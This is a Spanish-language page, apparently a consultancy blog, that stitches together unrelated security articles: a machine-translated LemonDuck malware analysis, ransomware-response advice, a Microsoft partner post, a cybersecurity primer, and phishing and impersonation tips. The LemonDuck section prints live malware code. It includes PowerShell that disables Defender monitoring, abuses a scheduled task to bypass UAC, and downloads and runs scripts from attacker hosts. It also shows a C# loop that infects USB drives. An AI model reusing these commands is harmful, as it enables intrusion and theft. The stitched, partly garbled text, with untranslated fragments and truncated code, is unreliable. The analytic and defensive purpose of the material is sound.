‎Desde que LemonDuck comenzó a funcionar, el .zip a .js método de ejecución de archivos es el más común. JavaScript ha reemplazado la tarea programada que LemonDuck usó anteriormente para iniciar el script de PowerShell.The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. Este script de PowerShell se ha visto muy similar a lo largo de 2020 y 2021, con cambios menores dependiendo de la versión, lo que indica un desarrollo continuo. A continuación se muestra una comparación de los cambios de las iteraciones más recientes de las descargas entregadas por correo electrónico y las de abril de 2020.‎

‎Script de PowerShell de abril de 2020‎‎Script de PowerShell de marzo de 2021‎
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);
//This File is broken.

‎Después de enviar los correos electrónicos, la bandeja de entrada se limpia para eliminar los rastros de estos correos. Este método de autodisparcimiento se intenta en cualquier dispositivo afectado que tenga un buzón, independientemente de si se trata de un servidor de Exchange.‎

‎Otros métodos comunes de infección incluyen el movimiento dentro del entorno comprometido, así como a través de USB y unidades conectadas. Estos procesos a menudo se inician automáticamente y han ocurrido consistentemente a lo largo de la totalidad de la operación de LemonDuck.‎

‎Estos métodos se ejecutan como una serie de scripts de C# que reúnen las unidades disponibles para la infección. También crean una lista en ejecución de unidades que ya están infectadas en función de si encuentra la amenaza ya instalada. Una vez comprobados con la lista en ejecución de unidades infectadas, estos scripts intentan crear un conjunto de archivos ocultos en el directorio de inicio, incluida una copia del ‎‎archivo Léame.js‎‎. Cualquier dispositivo que ha sido afectado por los implantes LemonDuck en cualquier momento podría haber tenido cualquier número de unidades conectadas a él que se ven comprometidas de esta manera. Esto hace que este comportamiento sea un posible vector de entrada para ataques adicionales.‎

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
{
if (!File.Exists(drive + home + inf_data))
{
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
{
blacklist.Add(drive.Name);
}
}
else {
Console.WriteLine(drive.Name+" already infected!");
blacklist.Add(drive.Name);
}
}
else{
blacklist.Add(drive.Name);

‎Protección integral contra una operación de malware de gran alcance‎

‎La visibilidad entre dominios y la defensa coordinada entregada por ‎Microsoft 365‎ defensor‎‎ está diseñado para la amplia gama y la creciente sofisticación de las amenazas que LemonDuck ejemplifica. ‎Microsoft 365‎ Defender tiene protecciones líderes en la industria impulsadas por IA que pueden detener amenazas de múltiples componentes como LemonDuck en dominios y plataformas. ‎Microsoft 365‎ Defensor de ‎‎Oficina 365‎‎ detecta los correos electrónicos maliciosos enviados por la botnet LemonDuck para entregar cargas útiles de malware, así como propagar el cargador de bots. Microsoft Defender for Endpoint detecta y bloquea los implantes, las cargas útiles y la actividad malintencionada de LemonDuck en Linux y Windows.‎

‎Más importante aún, ‎Microsoft 365‎ Defender proporciona herramientas de investigación enriquecidas que pueden exponer detecciones de actividad de LemonDuck, incluidos los intentos de comprometer y hacerse un hueco en la red, para que los equipos de operaciones de seguridad puedan responder y resolver estos ataques de manera eficiente y segura. ‎Microsoft 365‎ Defender correlaciona las señales multiplataforma y entre dominios para pintar la cadena de ataque de extremo a extremo, lo que permite a las organizaciones ver el impacto total de un ataque. También publicamos un artículo de análisis de amenazas sobre esta amenaza. ‎Microsoft 365‎ Los clientes de Defender pueden usar este informe para obtener detalles técnicos importantes, orientación para la investigación, incidentes consolidados y pasos para mitigar esta amenaza en particular y los ciberataques modernos en general.‎

¿Qué hacer después de un ataque ransomware?

Ante un ataque por ransomware los responsables de la seguridad deben ayudar a sus organizaciones a recuperar rápidamente la resiliencia, deben comprender y contrarrestar los nuevos desafíos que plantea este tipo de amenaza, fortalecer las defensas en los recursos humanos, los procesos y la tecnología, además de demostrar por qué la seguridad es esencial para la estrategia de los negocios.

Oswaldo Palacios, Director de Ingeniería de Ventas para México y LATAM de Guardicore, destacó que tras haberse confirmado un ataque de ransomware, los CISO deben evitar que se propague en la red, verificar el tipo de variante de ransomware (los principales de este año son: DoppelPaymer, Sodinokibi, Hades, Ryuk y Conti), aislar lo más posible los activos infectados e investigar cómo ocurrió el ataque, y comprender cabalmente la intrusión y la medición del impacto. 

El pago de los rescates puede abrir la puerta a una mayor criminalidad, por ello es recomendable no hacerlo; desafortunadamente no existe la seguridad de que los datos se puedan recuperar. 

“Es una moneda al aire hacer un pago y además se estaría alentando la ya creciente ola de delitos de este tipo. Existe una cifra negra respecto de las compañías que decidieron pagar para recuperar la información y, por el daño reputacional que añade, no existe un registro de dicha actividad”, dijo el directivo. 

Por su parte, el documento Respuesta y recuperación ante el ransomware elaborado por la firma de consultoría Accenture destacó que el ransomware puede crear una crisis de riesgo sistémico en los negocios y en la confianza del consumidor.

Los impactos típicos en los negocios incluyen: disrupción en la producción, la entrega o los servicios al cliente; pérdida de datos comerciales sensibles o información protegida; costos directos de reparación, recuperación o potencial pago de rescate; costos asociados a litigios, que suelen ser demandas colectivas; sanciones legales y regulatorias; y daño a la reputación. 

El directivo reiteró que un ataque de ransomware trae consigo un grave daño en la reputación de una empresa, ya que en algunos países es obligatorio el dar a conocer cuándo se ha sido víctima de este tipo de acontecimientos y, en determinados casos, pagar una multa; con lo cual se pone en entredicho la capacidad de las compañías para hacer frente a los ciberataques. 

Los ataques de ransomware van desde secuestro de información tales como bases de datos, respaldos y demás información crítica; en otros casos, el daño involucra servidores y aplicaciones de producción con lo cual la afectación es aún mayor, ya que la compañía podría dejar de operar y deberá asumir las pérdidas financieras que esto implica. 

A decir de Oswaldo Palacios, desafortunadamente no existe una compañía o herramienta que pueda romper el código de cifrado de un ransomware, por lo cual la estrategia de ciberseguridad se debe basar al 100% en prevenir un evento de este tipo.

“Una opción para adelantarnos a estos eventos maliciosos es el crear microsegmentos de comunicaciones con lo cual podemos asegurarnos de que nuestras joyas de la corona digitales serán accedidas por quien de verdad lo necesite y nos permite conocer al 100% la interacción de nuestro centro de datos. Es importante tener visibilidad sobre todos nuestros activos, ya que no se puede proteger, lo que no se puede ver”, precisó-

Reducir el riesgo de ransomware mediante el uso de una política de segmentación adecuada proviene de su simplicidad: un bit puede viajar por el cable (o un Vswitch) a una máquina diferente (o una VM / contenedor) o puede bloquearse, haciendo que el intento de los atacantes por alcanzar más recursos en la red sea inútil, dando al equipo más tiempo para responder al ataque y actualizar a las partes interesadas clave de la organización para que puedan tomar decisiones informadas sobre el daño de dicho ataque. 

“La implementación de soluciones preventivas como la segmentación de la red maximizan la seguridad de las organizaciones ante la posibilidad de sufrir un ciber ataque, ya sea de ransomware o de cualquier otra índole, que causaría además del gran costo económico un enorme daño a su marca y a su reputación”, finalizó Oswaldo Palacios. 

‎Permitir que sus clientes protejan su lugar de trabajo híbrido‎

‎El cambio generalizado al trabajo remoto a principios del año pasado catalizó lo que nuestro CEO Satya Nadella ‎‎describió‎‎ como “dos años de transformación digital en dos meses”. ‎

‎Ahora, se espera una nueva ola de cambio a medida que las organizaciones a nivel mundial cambian a un lugar de trabajo híbrido. ‎

‎Si bien este ritmo vertiginoso de evolución impulsada por la tecnología genera nuevas y emocionantes oportunidades para todo el ecosistema de socios de Microsoft, también descubre nuevos desafíos para que nuestros clientes naveguen, y una de las principales preocupaciones para cualquier organización es la ciberseguridad. Los cambios masivos en cómo y dónde trabajamos han generado nuevos tipos de amenazas de los malos actores cibernéticos, y se espera que la adopción más amplia del lugar de trabajo híbrido resulte en vulnerabilidades adicionales. ‎

‎Microsoft ‎‎procesa‎‎ más de 8 billones de señales cada 24 horas y repelió un récord de 30 mil millones de amenazas de correo electrónico el año pasado. A pesar de estos esfuerzos, el mundo ha entrado en lo que ‎‎el CVP de Microsoft, Vasu Jakkal,‎‎ se refirió como “un reino de ataques de siguiente nivel”. Todos nosotros debemos evolucionar perpetuamente nuestros procesos de seguridad para mantenernos al día con los sofisticados ataques de los ciberdelincuentes y ‎‎los hackers de los estados nacionales,‎‎y nuestros clientes confían en los socios más que nunca para ayudarlos a tomar las medidas correctas para mantener seguros los datos de sus organizaciones. ‎

‎Estamos comprometidos a garantizar que los socios tengan los recursos, las herramientas y la orientación necesarios para ayudar a los clientes a evolucionar sus prácticas de seguridad. Estas son áreas específicas de enfoque que ayudan a los socios a abordar los problemas de seguridad, cumplimiento e identidad para los clientes. ‎

‎Adopción de la autenticación multifactor‎ 

‎Las contraseñas son ineficaces y costosas de administrar, mientras que otras formas de autenticación ofrecen una experiencia más segura y fácil de usar. Requerir más de una forma de autenticación, o autenticación multifactor (MFA), también es más eficaz para comprobar la identidad y, como resultado, aumentar la seguridad. ‎‎Según Microsoft CISO Bret Arsenault,‎‎”El uso de MFA es la práctica de seguridad más efectiva que las empresas no están empleando”. Ha encabezado una campaña para eliminar las contraseñas por completo en Microsoft, y más del 90 por ciento de nuestra fuerza laboral actualmente utiliza métodos de autenticación alternativos. ‎

‎Al ayudar a los clientes a adoptar la autenticación multifactorial, los socios pueden ayudarlos a reducir drásticamente el riesgo de sus organizaciones. Sorprendentemente, solo el 18% de nuestros clientes tienen MFA activado. Teniendo en cuenta que cualquier cliente con una suscripción de servicio comercial (como Azure o Microsoft 365) puede activar MFA sin costo adicional, es una obviedad utilizar esta poderosa herramienta de defensa. Como la vicepresidenta sénior de Microsoft, Ann ‎‎Johnson, compartió‎‎recientemente: “El uso de bloques de MFA bloquea el 99,9 por ciento de los hackeos de cuentas a los que se enfrentan su organización y sus clientes, en promedio”. Y en un mundo donde redes enteras de proveedores y otras empresas de terceros comparten información, cerrar las vulnerabilidades de una organización puede ayudar a aumentar la seguridad. ‎

‎Migración a la nube‎ 

‎Las organizaciones deben seguir evaluando la migración a la nube para aumentar la seguridad. Mantener y defender los centros de datos locales puede ser costoso y llevar mucho tiempo. Recurrir a la nube externaliza gran parte de ese trabajo, lo que permite a su personal de TI priorizar su tiempo para centrarse en problemas de alto valor. ‎‎Según‎‎ Ann Johnson, “Con más empresas que confían en la tecnología de la nube, el desarrollo de una estrategia integral de ciberresiliencia como parte de un enfoque holístico de la resiliencia operativa hace que la preparación para una amplia gama de contingencias sea menos complicada”. ‎

‎Incorporamos la seguridad en todos nuestros productos y soluciones. La migración a Microsoft Azure permite a las empresas beneficiarse de las protecciones que ofrecen Microsoft Azure Sentinel, Microsoft Azure Active Directory, Microsoft Azure Purview y mucho más. Para revisar las últimas actualizaciones de seguridad relacionadas con Azure, puede leer mi blog sobre los‎‎ anuncios de seguridad‎‎ que hicimos durante Microsoft Ignite 2021 en marzo. ‎

‎Mejorar la capacitación de su fuerza de trabajo‎ 

‎La industria de la ciberseguridad se enfrenta a una escasez de trabajadores, lo que complica aún más mantenerse al día con la constante avalancha de ciberataques. Al crear los conjuntos de habilidades de seguridad dentro de su organización, puede posicionar mejor a su empresa para protegerse y ofrecer servicios valiosos y orientación a los clientes.‎

‎Nos esforzamos por garantizar que los socios tengan los recursos de capacitación y capacitación necesarios para mantener a su equipo preparado para manejar amenazas cibernéticas cada vez más complejas. Utilice nuestra ‎‎guía de habilitación‎‎ para encontrar cursos y recursos en línea. Nos complace anunciar que hemos lanzado cuatro nuevas certificaciones de seguridad, cumplimiento e identidad, que incluyen: ‎

  • ‎La ‎‎certificación de fundamentos de seguridad, cumplimiento e identidad de Microsoft‎‎ puede ayudar a las personas a mostrar conocimientos fundamentales de seguridad, cumplimiento e identidad en los servicios de Microsoft relacionados y basados en la nube. Puede ‎‎prepararse‎‎ para esta nueva certificación aprendiendo los conceptos y capacidades de las soluciones de seguridad, cumplimiento y administración de identidades y acceso de Microsoft. ‎
  • ‎La ‎‎certificación de administrador de Information Protection‎‎ puede ayudar a las personas a mostrar el conocimiento de los conceptos de datos principales y cómo se implementan mediante los servicios de datos de Azure.The Information Protection Administrator Certification can help individuals showcase knowledge of core data concepts and how they’re implemented using Azure data services. ‎
  • ‎La ‎‎Certificación de Administrador de Identidad y Acceso‎‎ puede ayudar a las personas a mostrar el conocimiento de los principios básicos de gobierno de identidad, así como garantizar un ciclo de vida de identidad adecuado. ‎
  • ‎La ‎‎certificación security operations analyst‎‎ puede ayudar a las personas a mostrar conocimientos sobre la mitigación de amenazas mediante soluciones de seguridad, cumplimiento e identidad de Microsoft, así como la realización de actividades proactivas de búsqueda de amenazas. ‎

‎En las próximas semanas, lanzaremos una nueva especialización avanzada de Hybrid Cloud Security. Esto ayudará a lograr un nivel único de diferenciación para las organizaciones ‎‎asociadas,‎‎ además de las actuales especializaciones avanzadas relacionadas con la seguridad para administración de identidad y acceso, protección y gobierno de la información y protección contra amenazas. ‎

‎La transformación digital continuará remodelando industrias enteras, y como lo hace, nuevas vulnerabilidades estarán expuestas. Si bien ninguna organización está exenta del riesgo cibernético, al usar la combinación correcta de recursos, conocimientos y herramientas, los socios pueden ayudar a nuestros clientes a forjar defensas que puedan reducir la probabilidad y el impacto de una violación. A medida que continuamos trabajando juntos, confío en que podamos estar a la altura del desafío de proteger nuestros datos colectivos, tanto ahora como en el futuro. ‎

Gracias a la consultoria de CADE podemos ayudarte asegurar que estas SEGURO!

visítanos cade.com.mx/diagnostico

¿Qué es la ciberseguridad?

La ciberseguridad es la práctica de defender las computadoras, los servidores, los dispositivos móviles, los sistemas electrónicos, las redes y los datos de ataques maliciosos. También se conoce como seguridad de tecnología de la información o seguridad de la información electrónica. El término se aplica en diferentes contextos, desde los negocios hasta la informática móvil, y puede dividirse en algunas categorías comunes.

  • La seguridad de red es la práctica de proteger una red informática de los intrusos, ya sean atacantes dirigidos o malware oportunista.
  • La seguridad de las aplicaciones se enfoca en mantener el software y los dispositivos libres de amenazas. Una aplicación afectada podría brindar acceso a los datos que está destinada a proteger. La seguridad eficaz comienza en la etapa de diseño, mucho antes de la implementación de un programa o dispositivo.
  • La seguridad de la información protege la integridad y la privacidad de los datos, tanto en el almacenamiento como en el tránsito.
  • La seguridad operativa incluye los procesos y decisiones para manejar y proteger los recursos de datos. Los permisos que tienen los usuarios para acceder a una red y los procedimientos que determinan cómo y dónde pueden almacenarse o compartirse los datos se incluyen en esta categoría.
  • La recuperación ante desastres y la continuidad del negocio definen la forma en que una organización responde a un incidente de ciberseguridad o a cualquier otro evento que cause que se detengan sus operaciones o se pierdan datos. Las políticas de recuperación ante desastres dictan la forma en que la organización restaura sus operaciones e información para volver a la misma capacidad operativa que antes del evento. La continuidad del negocio es el plan al que recurre la organización cuando intenta operar sin determinados recursos.
  • La capacitación del usuario final aborda el factor de ciberseguridad más impredecible: las personas. Si se incumplen las buenas prácticas de seguridad, cualquier persona puede introducir accidentalmente un virus en un sistema que de otro modo sería seguro. Enseñarles a los usuarios a eliminar los archivos adjuntos de correos electrónicos sospechosos, a no conectar unidades USB no identificadas y otras lecciones importantes es fundamental para la seguridad de cualquier organización.

La extensión de las ciberamenazas

Las ciberamenazas mundiales siguen desarrollándose a un ritmo rápido, con una cantidad cada vez mayor de filtraciones de datos cada año. En un informe de RiskBased Security, se reveló que unos alarmantes 7900 millones de registros han sido expuestos por filtraciones de datos solo en los primeros nueve meses del 2019. Esta cifra es más del doble (112 %) de la cantidad de registros expuestos en el mismo período durante el 2018.

Los servicios médicos, los minoristas y las entidades públicas fueron los que sufrieron más filtraciones, y los delincuentes maliciosos fueron los responsables de la mayoría de los incidentes. Algunos de estos sectores son más atractivos para los cibercriminales, ya que recopilan datos financieros y médicos, aunque todas las empresas que utilizan las redes pueden ser atacadas para robarles datos de clientes, hacer espionaje corporativo o lanzar ataques a sus clientes.

Con la extensión de las ciberamenazas en constante aumento, la Corporación Internacional de Datos predice que el gasto mundial en soluciones de ciberseguridad alcanzará la impresionante cifra de 133 700 millones de dólares para el año 2022. Los gobiernos de todo el mundo han respondido a las crecientes ciberamenazas con orientaciones para ayudar a las organizaciones a aplicar prácticas eficaces de ciberseguridad.

En Estados Unidos, el Instituto Nacional de Estándares y Tecnología (NIST) ha creado un marco de ciberseguridad. Para contrarrestar la proliferación de código malicioso y ayudar en la detección temprana, en el marco se recomienda el monitoreo continuo y en tiempo real de todos los recursos electrónicos.

La importancia de la vigilancia de los sistemas se refleja en los “10 pasos para la ciberseguridad”, orientación proporcionada por el Centro Nacional de Seguridad Cibernética del Gobierno del Reino Unido. En Australia, el Centro Australiano de Seguridad Cibernética (ACSC) publica periódicamente orientaciones sobre la forma en que las organizaciones pueden contrarrestar las últimas amenazas a la ciberseguridad.

Tipos de ciberamenazas

Las amenazas a las que se enfrenta la ciberseguridad son tres:

  1. El delito cibernético incluye agentes individuales o grupos que atacan a los sistemas para obtener beneficios financieros o causar interrupciones.
  2. Los ciberataques a menudo involucran la recopilación de información con fines políticos.
  3. El ciberterrorismo tiene como objetivo debilitar los sistemas electrónicos para causar pánico o temor.

Pero ¿cómo consiguen los agentes malintencionados el control de los sistemas informáticos? Estos son algunos de los métodos comunes utilizados para amenazar la ciberseguridad:

Malware

“Malware” se refiere al software malicioso. Ya que es una de las ciberamenazas más comunes, el malware es software que un cibercriminal o un hacker ha creado para interrumpir o dañar el equipo de un usuario legítimo. Con frecuencia propagado a través de un archivo adjunto de correo electrónico no solicitado o de una descarga de apariencia legítima, el malware puede ser utilizado por los ciberdelincuentes para ganar dinero o para realizar ciberataques con fines políticos.

Hay diferentes tipos de malware, entre los que se incluyen los siguientes:

  • Virus: un programa capaz de reproducirse, que se incrusta un archivo limpio y se extiende por todo el sistema informático e infecta a los archivos con código malicioso.
  • Troyanos: un tipo de malware que se disfraza como software legítimo. Los cibercriminales engañan a los usuarios para que carguen troyanos a sus computadoras, donde causan daños o recopilan datos.
  • Spyware: un programa que registra en secreto lo que hace un usuario para que los cibercriminales puedan hacer uso de esta información. Por ejemplo, el spyware podría capturar los detalles de las tarjetas de crédito.
  • Ransomware: malware que bloquea los archivos y datos de un usuario, con la amenaza de borrarlos, a menos que se pague un rescate.
  • Adware: software de publicidad que puede utilizarse para difundir malware.
  • Botnets: redes de computadoras con infección de malware que los cibercriminales utilizan para realizar tareas en línea sin el permiso del usuario.

Inyección de código SQL

Una inyección de código SQL (por sus siglas en inglés Structured Query Language) es un tipo de ciberataque utilizado para tomar el control y robar datos de una base de datos. Los cibercriminales aprovechan las vulnerabilidades de las aplicaciones basadas en datos para insertar código malicioso en una base de datos mediante una instrucción SQL maliciosa. Esto les brinda acceso a la información confidencial contenida en la base de datos.

Phishing

El phishing es cuando los cibercriminales atacan a sus víctimas con correos electrónicos que parecen ser de una empresa legítima que solicita información confidencial. Los ataques de phishing se utilizan a menudo para inducir a que las personas entreguen sus datos de tarjetas de crédito y otra información personal.

Ataque de tipo “Man-in-the-middle”

Un ataque de tipo “Man-in-the-middle” es un tipo de ciberamenaza en la que un cibercriminal intercepta la comunicación entre dos individuos para robar datos. Por ejemplo, en una red Wi-Fi no segura, un atacante podría interceptar los datos que se transmiten desde el dispositivo de la víctima y la red.

Ataque de denegación de servicio

Un ataque de denegación de servicio es cuando los cibercriminales impiden que un sistema informático satisfaga solicitudes legítimas sobrecargando las redes y los servidores con tráfico. Esto hace que el sistema sea inutilizable e impide que una organización realice funciones vitales.

Ciberamenazas más recientes

¿Cuáles son las ciberamenazas más recientes contra las que deben protegerse las personas y las organizaciones? A continuación, se presentan algunas de las ciberamenazas más recientes comunicadas por los gobiernos de Estados Unidos, Australia y el Reino Unido.

Malware Dridex

En diciembre del 2019, el Departamento de Justicia de los Estados Unidos (DoJ) imputó al líder de un grupo de cibercriminales organizados por su participación en un ataque global del malware Dridex. Esta campaña malintencionada afectó al público, al gobierno, a la infraestructura y a las empresas de todo el mundo.

Dridex es un troyano financiero que posee diferentes funcionalidades. Desde el 2014, afecta a las víctimas e infecta a las computadoras a través de correos electrónicos de phishing o malware existente. Es capaz de robar contraseñas, datos bancarios y datos personales que pueden utilizarse en transacciones fraudulentas, y ha causado pérdidas financieras masivas que suman cientos de millones de dólares.

En respuesta a los ataques de Dridex, el Centro Nacional de Seguridad Cibernética del Reino Unido aconseja a las personas que “se aseguren de que los dispositivos estén actualizados y los antivirus estén activados y actualizados, y de que se realicen copias de seguridad de los archivos”.

Estafas románticas

En febrero del 2020, el FBI advirtió a los ciudadanos de EE. UU. que tuvieran cuidado con el fraude a la confianza que los cibercriminales cometen a través de sitios de citas, salas de chat y aplicaciones. Los perpetradores se aprovechan de las personas que buscan nuevas parejas y engañan a las víctimas para que proporcionen sus datos personales.

El FBI informa que las ciberamenazas románticas afectaron a 114 víctimas de Nuevo México durante 2019, cuyas pérdidas financieras sumaron 1 600 000 dólares.

Malware Emotet

A finales del 2019, el Centro Australiano de Seguridad Cibernética advirtió a las organizaciones nacionales sobre la ciberamenaza mundial generalizada del malware Emotet.

Emotet es un sofisticado troyano que puede robar datos y también cargar otros malware. Emotet se aprovecha de las contraseñas poco sofisticadas y es un recordatorio de la importancia de crear una contraseña segura para protegerse de las ciberamenazas.

Protección del usuario final

La protección del usuario final o la seguridad de endpoints es un aspecto fundamental de la ciberseguridad. Después de todo, a menudo es un individuo (el usuario final) el que accidentalmente carga malware u otra forma de ciberamenaza en su equipo de escritorio, laptop o dispositivo móvil.

Por tanto, ¿de qué manera protegen las medidas de ciberseguridad a los usuarios finales y los sistemas? En primer lugar, la ciberseguridad depende de los protocolos criptográficos para cifrar los correos electrónicos, archivos y otros datos críticos. La ciberseguridad no solo protege la información en tránsito, también ofrece protección contra las pérdidas o el robo.

Además, el software de seguridad del usuario final analiza las computadoras para detectar código malicioso, pone en cuarentena este código y lo elimina del equipo. Los programas de seguridad pueden incluso detectar y eliminar el código malicioso oculto en el registro de arranque maestro (MBR) y están diseñados para cifrar o borrar datos del disco duro de la computadora.

Los protocolos de seguridad electrónica también se enfocan en la detección de malware en tiempo real. Muchos utilizan el análisis heurístico y de comportamiento para monitorear el comportamiento de un programa y su código para defenderse de virus o troyanos que pueden cambiar de forma con cada ejecución (malware polimórfico y metamórfico). Los programas de seguridad pueden restringir los programas que puedan ser maliciosos en una burbuja virtual separada de la red del usuario para analizar su comportamiento y aprender a detectar mejor las nuevas infecciones.

Los programas de seguridad continúan desarrollando nuevas defensas mientras los profesionales de la ciberseguridad identifican nuevas amenazas y formas de combatirlas. Para aprovechar al máximo el software de seguridad del usuario final, los empleados deben aprender a utilizarlo. Lo fundamental es mantenerlo en funcionamiento y actualizarlo con frecuencia para que pueda proteger a los usuarios de las ciberamenazas más recientes.

Consejos de ciberseguridad: protéjase de los ciberataques

¿Cómo pueden las empresas y las personas protegerse contra las ciberamenazas? A continuación, presentamos nuestros mejores consejos de ciberseguridad:

  1. Actualizar el software y el sistema operativo: esto significa que aprovechará las últimas revisiones de seguridad.
  2. Utilizar software antivirus: las soluciones de seguridad, como Kaspersky Total Security, detectarán y eliminarán las amenazas. Mantenga su software actualizado para obtener el mejor nivel de protección.
  3. Utilizar contraseñas seguras: asegúrese de que sus contraseñas no sean fáciles de adivinar.
  4. No abrir archivos adjuntos de correos electrónicos de remitentes desconocidos: podrían estar infectados con malware.
  5. No hacer clic en los vínculos de los correos electrónicos de remitentes o sitios web desconocidos: es una forma común de propagación de malware.
  6. Evitar el uso de redes Wi-Fi no seguras en lugares públicos: las redes no seguras lo dejan vulnerable a ataques del tipo “Man-in-the-middle”.

Cuidado con las llamadas que recibes, es el último truco Phishing



El objetivo final es el de siempre: engañar a un usuario para que acceda a instalar un programa, iniciar sesión o descargar algún archivo. De esta forma el atacante puede tener la posibilidad de robar contraseñas o de instalar malware con el que poder controlar el equipo o incluso pedir un rescate económico, como es el caso del ransomware.



En esta ocasión la víctima recibe un e-mail, un clásico en las estafas online, en el que les indican que tiene una suscripción en una plataforma de pago y que para cancelarla tiene que llamar a un número de teléfono que les facilitan. El usuario desprevenido puede alarmarse y pensar que le han robado la cuenta o ha habido algún problema y alguien le ha suscrito a ese servicio.

Una vez llama por teléfono se encuentra con que le indican que para cancelar la suscripción tiene que descargar un archivo. Los responsables de “atención telefónica” van indicando los pasos a seguir hasta que ese usuario ha descargado e instalado lo que en realidad es la carga útil del malware.
Concretamente se trata de una supuesta suscripción a un servicio de Streaming. Claro, hoy en día es muy común que los usuarios se registren en plataformas como Netflix o HBO. Es una realidad que muchos datos personales terminan en la Dark Web y pueden ser usados por terceros para robar información y llevar a cabo suscripciones fraudulentas. La víctima, una vez sigue los pasos que le indican en esa llamada telefónica, descarga e instala BazaLoader.

Esta amenaza lo que hace es crear una puerta trasera en Windows. El atacante va a tener control total sobre el sistema y puede desplegar diferentes estrategias y colar otras variedades de malware. Robo de contraseñas, ransomware y control total Cuando el atacante ha logrado su objetivo y la víctima ha instalado BazaLoader, puede robar información, archivos e infectar el equipo de formas muy variadas. Uno de esos ataques puede ser colar ransomware, como es el caso de Ryuk, que suele llegar a través de este software malicioso. De esta forma el pirata informático va a poder lucrarse. A fin de cuentas el ransomware es una de las estrategias más utilizadas para infectar equipos y poder obtener un beneficio económico posteriormente. De ahí que sea imprescindible estar protegidos.
Pero este truco no solo puede terminar en esta campaña en concreto. En esta ocasión indican que la víctima se ha suscrito a una prueba de una plataforma de Streaming y que posteriormente le cobrarán si no la cancela previamente.

Estrategias similares, también haciendo uso de una llamada telefónica, pueden terminar en un final similar, con las claves de acceso robadas o el equipo infectado con alguna variedad de malware. Para evitar esto va a ser imprescindible el sentido común. Nunca debemos cometer errores que puedan afectar a nuestra seguridad. Es esencial saber reconocer una web como ataque Phishing, así como también será imprescindible contar con programas de seguridad que puedan protegernos.

¿Están suplantándote en redes sociales? Evítalo

A través de las redes sociales como Facebook, Instagram o Twitter podemos sufrir ataques muy variados. Podemos recibir mensajes Phishing que busquen acceder a nuestras cuentas y poner en riesgo los equipos. También pueden ser utilizadas para colar links maliciosos que nos lleven a la descarga de malware. Pero sin duda algo que hay que tener en cuenta es el robo de datos.
Muchos usuarios han experimentado alguna vez que han suplantado su perfil en alguna red social. Esto puede ocurrir a usuarios domésticos, pero también es muy común en empresas y organizaciones. Pueden incluso llegar a usar el perfil original, sin que la víctima llegue a saberlo.
Esto lo pueden lograr a través de métodos muy diversos, como es la recopilación de datos personales. Un atacante puede obtener información de un usuario y posteriormente crear un perfil idéntico. Por ejemplo, suplantar la imagen de perfil, poner el mismo nombre, los datos como el lugar de trabajo, número de móvil, etc. Esto haría que pudiera pasar desapercibido y creyeran que realmente esa persona se ha creado una cuenta nueva. Al crear un perfil que suplanta la identidad de otro usuario, un atacante puede tener vía libre para enviar malware a los contactos, recopilar más datos, enviar mensajes Phishing… A fin de cuentas, están utilizando un perfil que podría pasar desapercibido.
Consejos para evitar la suplantación de identidad
Llegado a este punto queremos dar algunos consejos para evitar que suplanten nuestra identidad en redes sociales. Una serie de recomendaciones sencillas que podemos poner en práctica y reducir así el impacto que podemos sufrir al usar Facebook, Instagram o cualquier otra plataforma similar.
Evitar exponer los datos personales
Algo muy importante es evitar poner nuestros datos personales en Internet. No hay mejor forma para los piratas informáticos de suplantar nuestra identidad que el hecho de que esté disponible para cualquiera en la red. Pueden usar bots para ver todos estos datos. Por tanto, si utilizamos redes sociales y no queremos problemas, algo interesante es reducir la cantidad de información que hacemos pública. Es buena idea hacer los perfiles privados y que no estén disponibles para cualquiera.
Cuidar dónde iniciamos sesión
Por supuesto también debemos tener cuidado a la hora de iniciar sesión. En este caso es importante evitar las redes públicas que sean inseguras o en su defecto hacer uso de una VPN. Pero también hay que evitar utilizar programas de terceros que no sean de confianza y puedan suponer un problema.
Mantener el equipo seguro
Otra cuestión muy importante es la de mantener nuestros equipos correctamente protegidos. Es fundamental tener un buen antivirus, así como otras herramientas como podría ser un firewall. De esta forma podremos evitar la entrada de malware. Pero también hay que tener en cuenta la importancia de que los sistemas estén actualizados. A veces surgen vulnerabilidades que pueden ser usadas por los atacantes para lograr su objetivo y llegar a suplantar nuestras cuentas en redes sociales. Hay que instalar los parches disponibles.
Proteger siempre la cuenta
La principal barrera que tenemos para evitar intrusos en las redes sociales es la contraseña. Tiene que ser una clave fuerte y compleja, que contenga números, letras (mayúsculas y minúsculas), así como otros símbolos especiales. Todo ello, además, de forma aleatoria. Además, otro punto interesante es aplicar la autenticación en dos pasos. Una manera de agregar una capa extra de seguridad a nuestros registros. Así podremos aumentar la seguridad y evitar problemas.
No dejar perfiles zombis
